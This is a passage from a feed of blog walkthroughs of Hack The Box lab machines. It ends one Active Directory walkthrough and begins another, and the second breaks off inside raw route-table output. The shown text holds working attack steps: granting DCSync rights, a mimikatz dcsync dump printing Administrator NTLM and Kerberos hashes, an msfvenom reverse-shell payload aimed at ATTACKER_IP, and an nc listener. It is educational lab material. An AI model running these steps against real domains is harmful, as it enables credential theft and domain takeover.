<code>download</code> feature.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Famat3bthjibffpc1p8ej.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Famat3bthjibffpc1p8ej.png" alt="bloodhound" width="800" height="220"></a></p> <p>Checking the user groups manually <code>whoami /groups and with bloodhoud</code>, I see that the user is part of <code>Account Operators group</code>, this means that the user can can <code>create, modify, and delete most user accounts, groups, and computer objects within the domain</code></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp03kz43cln63csdw5mtf.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp03kz43cln63csdw5mtf.png" alt="terminal" width="800" height="254"></a></p> <h2> Bloodhound </h2> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9tl3z9yey91z17x7rw7i.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9tl3z9yey91z17x7rw7i.png" alt="bloodhound" width="800" height="282"></a></p> <p>Now it means with the current user permission, we can: </p> <ol> <li>Change user's group</li> <li>Add a user into a new group including self</li> <li>Create a new user</li> </ol> <p>Now let's check the shortes way to domain admin on bloodhound</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3dqsitcewj0grlfqiz16.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3dqsitcewj0grlfqiz16.png" alt="shortest" width="800" height="258"></a></p> <p>The <code>Exchange Windows Permissions</code> group became interesting. When I search for it on the web, this mean:</p> <ul> <li>Member of this group is granted WriteDACL access.</li> </ul> <p>This means If we are part of this group we can grant ourself <code>DCSync rights</code>.</p> <p>Remeber we are already in the group that allow us to add any user to any group <code>Account Operators</code></p> <p>So let's go ahead and add ourself to the <code>Exchange Windows Permissions</code> group, but first let's upload powerview.</p> <p>Let's add our current user <code>svc-alfresco</code> to <code>Exchange Windows Permissions</code> group with the command below:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>net group <span class="s2">"Exchange Windows Permissions"</span> svc-alfresco /add </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv9rzscj8ga8c1gqiysbv.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv9rzscj8ga8c1gqiysbv.png" alt="root" width="800" height="261"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhvxe0khazbz32ww4orc8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhvxe0khazbz32ww4orc8.png" alt="root" width="" height=""></a></p> <p>Now let's grant ourself <code>DCSync rights</code> with the command below<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>Add-DomainObjectAcl <span class="nt">-TargetIdentity</span> <span class="s2">"DC=htb,DC=local"</span> <span class="nt">-PrincipalIdentity</span> <span class="s2">"svc-alfresco"</span> <span class="nt">-Rights</span> DCSync </code></pre> </div> <p>Once the command above run successfully, let's move on to upload <code>mimikatz</code> on the target to perform secret dump. With mimikatz successfully uploaded to the host, let's run the command to dump <code>Administrator</code> hash.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>.<span class="se">\m</span>imikatz.exe <span class="s1">'lsadump::dcsync /domain:HTB.LOCAL /user:administrator'</span> <span class="nb">exit</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\s</span>vc-alfresco<span class="se">\D</span>ocuments&gt; .<span class="se">\m</span>imikatz.exe <span class="s1">'lsadump::dcsync /domain:HTB.LOCAL /user:administrator'</span> <span class="nb">exit</span> .#####. mimikatz 2.2.0 <span class="o">(</span>x64<span class="o">)</span> <span class="c">#18362 Feb 29 2020 11:13:36</span> .## ^ <span class="c">##. "A La Vie, A L'Amour" - (oe.eo)</span> <span class="c">## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )</span> <span class="c">## \ / ## &gt; http://blog.gentilkiwi.com/mimikatz</span> <span class="s1">'## v ##'</span> Vincent LE TOUX <span class="o">(</span> vincent.letoux@gmail.com <span class="o">)</span> <span class="s1">'#####'</span> <span class="o">&gt;</span> http://pingcastle.com / http://mysmartlogon.com <span class="k">***</span>/ mimikatz<span class="o">(</span>commandline<span class="o">)</span> <span class="c"># lsadump::dcsync /domain:HTB.LOCAL /user:administrator</span> <span class="o">[</span>DC] <span class="s1">'HTB.LOCAL'</span> will be the domain <span class="o">[</span>DC] <span class="s1">'FOREST.htb.local'</span> will be the DC server <span class="o">[</span>DC] <span class="s1">'administrator'</span> will be the user account Object RDN : Administrator <span class="k">**</span> SAM ACCOUNT <span class="k">**</span> SAM Username : Administrator User Principal Name : Administrator@htb.local Account Type : 30000000 <span class="o">(</span> USER_OBJECT <span class="o">)</span> User Account Control : 00000200 <span class="o">(</span> NORMAL_ACCOUNT <span class="o">)</span> Account expiration : Password last change : 8/30/2021 5:51:58 PM Object Security ID : S-1-5-21-3072663084-364016917-1341370565-500 Object Relative ID : 500 Credentials: Hash NTLM: 32693b11e6aa90eb43d32c72a07ceea6 ntlm- 0: 32693b11e6aa90eb43d32c72a07ceea6 ntlm- 1: 9307ee5abf7791f3424d9d5148b20177 ntlm- 2: 32693b11e6aa90eb43d32c72a07ceea6 lm - 0: 9498c81fd53411e023fcd1ff4cd3e482 lm - 1: f505fe58b1dedbe3015454d212af5115 Supplemental Credentials: <span class="k">*</span> Primary:NTLM-Strong-NTOWF <span class="k">*</span> Random Value : cad4a87763ba795c795b96486148bb95 <span class="k">*</span> Primary:Kerberos-Newer-Keys <span class="k">*</span> Default Salt : HTB.LOCALAdministrator Default Iterations : 4096 Credentials aes256_hmac <span class="o">(</span>4096<span class="o">)</span> : 910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913 aes128_hmac <span class="o">(</span>4096<span class="o">)</span> : b5880b186249a067a5f6b814a23ed375 des_cbc_md5 <span class="o">(</span>4096<span class="o">)</span> : c1e049c71f57343b OldCredentials aes256_hmac <span class="o">(</span>4096<span class="o">)</span> : 44f53d59845f6fc874991dadd99efa2513ed4f1d26762c2130cb6af13c39d90a aes128_hmac <span class="o">(</span>4096<span class="o">)</span> : 08f52532321ad13ccb9f2dc613aac29d des_cbc_md5 <span class="o">(</span>4096<span class="o">)</span> : 977a57459e191a98 <span class="k">*</span> Primary:Kerberos <span class="k">*</span> Default Salt : HTB.LOCALAdministrator Credentials des_cbc_md5 : c1e049c71f57343b OldCredentials des_cbc_md5 : 977a57459e191a98 <span class="k">*</span> Packages <span class="k">*</span> NTLM-Strong-NTOWF mimikatz<span class="o">(</span>commandline<span class="o">)</span> <span class="c"># exit</span> Bye! </code></pre> </div> <p>Yeeeeepee!!!! Our attack is successfull, we have Administrator hash now, let user evil_winrm</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fko6f1jh9huirdfeqgzez.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fko6f1jh9huirdfeqgzez.png" alt="root" width="800" height="202"></a></p> <p>Game over!!!! We own the Domain Admin.</p> hacktoberfest programming oscp pnpt HTB – AD Enumeration & Attacks – Skills Assessment Part I - Walkthrough - without Metasploit Michael Oladele Sat, 02 May 2026 13:13:50 +0000 https://forem.com/micheaol/htb-ad-enumeration-attacks-skills-assessment-part-i-walkthrough-without-metasploit-2bo9 https://forem.com/micheaol/htb-ad-enumeration-attacks-skills-assessment-part-i-walkthrough-without-metasploit-2bo9 <h2> Scenario: </h2> <p>A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials: admin:My_W3bsH3ll_P@ssw0rd!) in place for us to start from in the /uploads directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise.</p> <h2> Enumeration </h2> <ul> <li>Before switching projects, our teammate left a password-protected web shell (with the credentials: admin:My_W3bsH3ll_P@ssw0rd! in place for us to start from in the /uploads directory. </li> <li><p>We have initial credentials <code>admin:My_W3bsH3ll_P@ssw0rd!</code></p></li> <li><p>Based on the info we have, I browse to the url/uploads:</p></li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F07o9jh2e7icyzcfx7i1o.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F07o9jh2e7icyzcfx7i1o.png" alt="webshell" width="800" height="380"></a></p> <ul> <li>When I clicked on the antak.aspx, I was directed to the authentcation page.</li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F57d3l8n6xig7301ezbe1.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F57d3l8n6xig7301ezbe1.png" alt="webshell" width="800" height="360"></a></p> <p>Let's try the credentials provided by the team: <code>admin:My_W3bsH3ll_P@ssw0rd!</code></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faub7s8u0zhi1hnpejejf.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faub7s8u0zhi1hnpejejf.png" alt="webshell" width="800" height="257"></a></p> <ul> <li><p>I was able to log into antak webshell as shown in the image above.</p></li> <li><p>I check <code>systeminfo</code> to understand the system architecture:</p></li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw76bt51kej3a22hgqo0u.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw76bt51kej3a22hgqo0u.jpg" alt="webshell" width="800" height="477"></a></p> <h2> Exploitation </h2> <p>Now my head started spinning on how to pop a reverse shell without metasploit, so I created a base 64 payload with <code>msfvenom</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">msfvenom</span><span class="w"> </span><span class="nt">-p</span><span class="w"> </span><span class="nx">windows/x64/shell_reverse_tcp</span><span class="w"> </span><span class="nx">LHOST</span><span class="o">=</span><span class="err">&lt;</span><span class="n">ATTACKER_IP</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">LPORT</span><span class="o">=</span><span class="err">&lt;</span><span class="n">ATTACKER_Port</span><span class="err">&gt;</span><span class="w"> </span><span class="nt">-f</span><span class="w"> </span><span class="nx">exe</span><span class="w"> </span><span class="nt">-o</span><span class="w"> </span><span class="nx">shell.exe</span><span class="w"> </span></code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv44jfu9tredf0b6vqpr8.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv44jfu9tredf0b6vqpr8.jpg" alt="payload" width="800" height="226"></a></p> <p>Now our payload is ready, we need to upload it to the target:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7up7z3bgflgwur0ykwwy.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7up7z3bgflgwur0ykwwy.png" alt="shell" width="800" height="226"></a></p> <p>Start nc listener on my attack machine:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nc <span class="nt">-lvnp</span> 4466 </code></pre> </div> <p>In the terminal I then run C:\myshell.exe or whatever the name your payload is named, then I have a shell:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcu8nxe0ejn611zel5n8e.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcu8nxe0ejn611zel5n8e.png" alt="shell" width="800" height="356"></a></p> <ul> <li><p>To use native commands, I type powershell in the shell to get into powershell</p></li> <li><p>To know the host identity and domain info I ran <code>Get-ChildItem Env: | ft key,value</code><br> </p></li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Get-ChildItem</span><span class="w"> </span><span class="nx">Env:</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">ft</span><span class="w"> </span><span class="nx">key</span><span class="p">,</span><span class="nx">value</span><span class="w"> </span><span class="n">Get-ChildItem</span><span class="w"> </span><span class="nx">Env:</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">ft</span><span class="w"> </span><span class="nx">key</span><span class="p">,</span><span class="nx">value</span><span class="w"> </span><span class="n">Key</span><span class="w"> </span><span class="nx">Value</span><span class="w"> </span><span class="o">---</span><span class="w"> </span><span class="o">-----</span><span class="w"> </span><span class="n">ALLUSERSPROFILE</span><span class="w"> </span><span class="nx">C:\ProgramData</span><span class="w"> </span><span class="n">APP_POOL_CONFIG</span><span class="w"> </span><span class="nx">C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config</span><span class="w"> </span><span class="n">APP_POOL_ID</span><span class="w"> </span><span class="nx">DefaultAppPool</span><span class="w"> </span><span class="n">APPDATA</span><span class="w"> </span><span class="nx">C:\Windows\system32\config\systemprofile\AppData\Roaming</span><span class="w"> </span><span class="n">CommonProgramFiles</span><span class="w"> </span><span class="nx">C:\Program</span><span class="w"> </span><span class="nx">Files\Common</span><span class="w"> </span><span class="nx">Files</span><span class="w"> </span><span class="n">CommonProgramFiles</span><span class="p">(</span><span class="n">x86</span><span class="p">)</span><span class="w"> </span><span class="nx">C:\Program</span><span class="w"> </span><span class="nx">Files</span><span class="w"> </span><span class="p">(</span><span class="n">x86</span><span class="p">)</span><span class="nx">\Common</span><span class="w"> </span><span class="nx">Files</span><span class="w"> </span><span class="n">CommonProgramW6432</span><span class="w"> </span><span class="nx">C:\Program</span><span class="w"> </span><span class="nx">Files\Common</span><span class="w"> </span><span class="nx">Files</span><span class="w"> </span><span class="n">COMPUTERNAME</span><span class="w"> </span><span class="nx">WEB-WIN01</span><span class="w"> </span><span class="n">ComSpec</span><span class="w"> </span><span class="nx">C:\Windows\system32\cmd.exe</span><span class="w"> </span><span class="n">DriverData</span><span class="w"> </span><span class="nx">C:\Windows\System32\Drivers\DriverData</span><span class="w"> </span><span class="n">LOCALAPPDATA</span><span class="w"> </span><span class="nx">C:\Windows\system32\config\systemprofile\AppData\Local</span><span class="w"> </span><span class="n">NUMBER_OF_PROCESSORS</span><span class="w"> </span><span class="nx">4</span><span class="w"> </span><span class="n">OS</span><span class="w"> </span><span class="nx">Windows_NT</span><span class="w"> </span><span class="n">Path</span><span class="w"> </span><span class="nx">C:\Windows\system32</span><span class="p">;</span><span class="n">C:\Windows</span><span class="p">;</span><span class="n">C:\Windows\System32\Wbem</span><span class="p">;</span><span class="n">C:\Windows\System32\WindowsPower...</span><span class="w"> </span><span class="nx">PATHEXT</span><span class="w"> </span><span class="o">.</span><span class="nf">COM</span><span class="p">;</span><span class="o">.</span><span class="nf">EXE</span><span class="p">;</span><span class="o">.</span><span class="nf">BAT</span><span class="p">;</span><span class="o">.</span><span class="nf">CMD</span><span class="p">;</span><span class="o">.</span><span class="nf">VBS</span><span class="p">;</span><span class="o">.</span><span class="nf">VBE</span><span class="p">;</span><span class="o">.</span><span class="nf">JS</span><span class="p">;</span><span class="o">.</span><span class="nf">JSE</span><span class="p">;</span><span class="o">.</span><span class="nf">WSF</span><span class="p">;</span><span class="o">.</span><span class="nf">WSH</span><span class="p">;</span><span class="o">.</span><span class="nf">MSC</span><span class="p">;</span><span class="o">.</span><span class="nf">CPL</span><span class="w"> </span><span class="n">PROCESSOR_ARCHITECTURE</span><span class="w"> </span><span class="nx">AMD64</span><span class="w"> </span><span class="n">PROCESSOR_IDENTIFIER</span><span class="w"> </span><span class="nx">AMD64</span><span class="w"> </span><span class="nx">Family</span><span class="w"> </span><span class="nx">25</span><span class="w"> </span><span class="nx">Model</span><span class="w"> </span><span class="nx">1</span><span class="w"> </span><span class="nx">Stepping</span><span class="w"> </span><span class="nx">1</span><span class="p">,</span><span class="w"> </span><span class="nx">AuthenticAMD</span><span class="w"> </span><span class="n">PROCESSOR_LEVEL</span><span class="w"> </span><span class="nx">25</span><span class="w"> </span><span class="n">PROCESSOR_REVISION</span><span class="w"> </span><span class="nx">0101</span><span class="w"> </span><span class="n">ProgramData</span><span class="w"> </span><span class="nx">C:\ProgramData</span><span class="w"> </span><span class="n">ProgramFiles</span><span class="w"> </span><span class="nx">C:\Program</span><span class="w"> </span><span class="nx">Files</span><span class="w"> </span><span class="n">ProgramFiles</span><span class="p">(</span><span class="n">x86</span><span class="p">)</span><span class="w"> </span><span class="nx">C:\Program</span><span class="w"> </span><span class="nx">Files</span><span class="w"> </span><span class="p">(</span><span class="n">x86</span><span class="p">)</span><span class="w"> </span><span class="n">ProgramW6432</span><span class="w"> </span><span class="nx">C:\Program</span><span class="w"> </span><span class="nx">Files</span><span class="w"> </span><span class="n">PROMPT</span><span class="w"> </span><span class="nv">$P$G</span><span class="w"> </span><span class="n">PSExecutionPolicyPreference</span><span class="w"> </span><span class="nx">Bypass</span><span class="w"> </span><span class="n">PSModulePath</span><span class="w"> </span><span class="nx">WindowsPowerShell\Modules</span><span class="p">;</span><span class="n">C:\Program</span><span class="w"> </span><span class="nx">Files\WindowsPowerShell\Modules</span><span class="p">;</span><span class="n">C:\Windows\system32...</span><span class="w"> </span><span class="nx">PUBLIC</span><span class="w"> </span><span class="nx">C:\Users\Public</span><span class="w"> </span><span class="n">SystemDrive</span><span class="w"> </span><span class="nx">C:</span><span class="w"> </span><span class="n">SystemRoot</span><span class="w"> </span><span class="nx">C:\Windows</span><span class="w"> </span><span class="n">TEMP</span><span class="w"> </span><span class="nx">C:\Windows\TEMP</span><span class="w"> </span><span class="n">TMP</span><span class="w"> </span><span class="nx">C:\Windows\TEMP</span><span class="w"> </span><span class="n">USERDOMAIN</span><span class="w"> </span><span class="nx">INLANEFREIGHT</span><span class="w"> </span><span class="n">USERNAME</span><span class="w"> </span><span class="nx">WEB-WIN01</span><span class="err">$</span><span class="w"> </span><span class="n">USERPROFILE</span><span class="w"> </span><span class="nx">C:\Windows\system32\config\systemprofile</span><span class="w"> </span><span class="n">windir</span><span class="w"> </span><span class="nx">C:\Windows</span><span class="w"> </span></code></pre> </div> <p><code>COMPUTERNAME : WEB-WIN01USERDOMAIN : INLANEFREIGHT</code></p> <h2> 👉 Now we Confirm: </h2> <ul> <li>machine name</li> <li><p>domain membership</p></li> <li><p>Let's run <code>route print</code> To understand network reachability and pivot opportunities<br> </p></li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">route</span><span class="w"> </span><span class="nx">print</span><span class="w"> </span><span class="n">route</span><span class="w"> </span><span class="nx">print</span><span class="w"> </span><span class="o">===========================================================================</span><span class="w"> </span><span class="kr">Interface</span><span class="w"> </span><span class="n">List</span><span class="w"> </span><span class="nx">7...00</span><span class="w"> </span><span class="nx">50</span><span class="w"> </span><span class="nx">56</span><span class="w"> </span><span class="nx">94</span><span class="w"> </span><span class="nx">db</span><span class="w"> </span><span class="nx">4c</span><span class="w"> </span><span class="o">......</span><span class="nf">vmxnet3</span><span class="w"> </span><span class="nx">Ethernet</span><span class="w"> </span><span class="nx">Adapter</span><span class="w"> </span><span class="c">#2</span><span class="w"> </span><span class="mi">3</span><span class="o">...</span><span class="nf">00</span><span class="w"> </span><span class="mi">50</span><span class="w"> </span><span class="mi">56</span><span class="w"> </span><span class="mi">94</span><span class="w"> </span><span class="mi">9</span><span class="n">e</span><span class="w"> </span><span class="nx">af</span><span class="w"> </span><span class="o">......</span><span class="nf">vmxnet3</span><span class="w"> </span><span class="nx">Ethernet</span><span class="w"> </span><span class="nx">Adapter</span><span class="w"> </span><span class="mi">1</span><span class="o">...........................</span><span class="nf">Software</span><span class="w"> </span><span class="n">Loopback</span><span class="w"> </span><span class="nx">Interface</span><span class="w"> </span><span class="nx">1</span><span class="w"> </span><span class="o">===========================================================================</span><span class="w"> </span><span class="n">IPv4</span><span class="w"> </span><span class="nx">Route</span><span class="w"> </span><span class="nx">Table</span><span class="w"> </span><span class="o">===========================================================================</span><span class="w"> </span><span class="n">Active</span><span class="w"> </span><span class="nx">Routes:</span><span class="w"> </span><span class="n">Network</span><span class="w"> </span><span class="nx">Destination</span><span class="w"> </span><span class="nx">Netmask</span><span class="w"> </span><span class="nx">Gateway</span><span class="w"> </span><span class="nx">Interface</span><span class="w"> </span><span class="nx">Metric</span><span class="w"> </span><span class="mf">0.0</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="mf">0.0</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="mf">172.16</span><span class="o">.</span><span class="nf">6</span><span class="o">.</span><span class="nf">1</span><span class="w"> </span><span class="mf">172.16</span><span class="o">.</span><span class="nf">6</span><span class="o">.</span><span class="nf">100</span><span class="w"> </span><span class="mi">11</span><span class="w"> </span><span class="mf">0.0</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="mf">0.0</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="mf">10.129</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">1</span><span class="w"> </span><span class="mf">10.129</span><span class="o">.</span><span class="nf">25</span><span class="o">.</span><span class="nf">22</span><span class="w"> </span><span class="mi">15</span><span class="w"> </span><span class="mf">10.129</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="mf">255.255</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="n">On-link</span><span class="w"> </span><span class="nx">10.129.25.22</span><span class="w"> </span><span class="nx">271</span><span class="w"> </span><span class="mf">10.129</span><span class="o">.</span><span class="nf">25</span><span class="o">.</span><span class="nf">22</span><span class="w"> </span><span class="mf">255.255</span><span class="o">.</span><span class="nf">255</span><span class="o">.</span><span class="nf">255</span><span class="w"> </span><span class="n">On-link</span><span class="w"> </span><span class="nx">10.129.25.22</span><span class="w"> </span><span class="nx">271</span><span class="w"> </span><span class="mf">10.129</span><span class="o">.</span><span class="nf">255</span><span class="o">.</span><span class="nf">255</span><span class="w"> </span><span class="mf">255.255</span><span class="o">.</span><span class="nf">255</span><span class="o">.</span><span class="nf">255</span><span class="w"> </span><span class="n">On-link</span><span class="w"> </span><span class="nx">10.129.25.22</span><span class="w"> </span><span class="nx">271</span><span class="w"> </span><span class="mf">127.0</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="mf">255.0</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="n">On-link</span><span class="w"> </span><span class="nx">127.0.0.1</span><span class="w"> </span><span class="nx">331</span><span class="w"> </span><span class="mf">127.0</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">1</span><span class="w"> </span><span class="mf">255.255</span><span class="o">.</span><span class="nf">255</span><span class="o">.</span><span class="nf">255</span><span class="w"> </span><span class="n">On-link</span><span class="w"> </span><span class="nx">127.0.0.1</span><span class="w"> </span><span class="nx">331</span><span class="w"> </span><span class="mf">127.255</span><span class="o">.</span><span class="nf">255</span><span class="o">.</span><span class="nf">255</span><span class="w"> </span><span class="mf">255.255</span><span class="o">.</span><span class="nf">255</span><span class="o">.</span><span class="nf">255</span><span class="w"> </span><span class="n">On-link</span><span class="w"> </span><span class="nx">127.0.0.1</span><span class="w"> </span><span class="nx">331</span><span class="w"> </span><span class="mf">172.16</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="mf">255.255</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="n">On-link</span><span class="w"> </span><span class="nx">172.16.6.100</span><span class="w"> </span><span class="nx">266</span><span class="w"> </span><span class="mf">172.16</span><span class="o">.</span><span class="nf">6</span><span class="o">.</span><span class="nf">100</span><span class="w"> </span><span class="mf">255.255</span><span class="o">.</span><span class="nf">255</span><span class="o">.</span><span class="nf">255</span><span class="w"> </span><span class="n">On-link</span><span class="w"> </span><span class="nx">172.16.6.100</span><span class="w"> </span><span class="nx">266</span><span class="w"> </span><span class="mf">172.16</span><span class="o">.</span><span class="nf">255</span><span class="o">.</span><span class="nf">255</span><span class="w"> </span><span class="mf">255.255</span><span class="o">.</span><span class="nf">255</span><span class="o">.</span><span class="nf">255</span><span class="w"> </span><span class="n">On-link</span><span class="w"> </span><span class="nx">172.16.6.100</span><span class="w"> </span><span class="nx">266</span><span class="w"> </span><span class="mf">224.0</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="mf">240.0</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="n">On-link</span><span class="w"> </span><span class="nx">127.0.0.1</span><span class="w"> </span><span class="nx">331</span><span class="w"> </span><span class="mf">224.0</span><span class="o">.</span><span class="nf">0</span><span 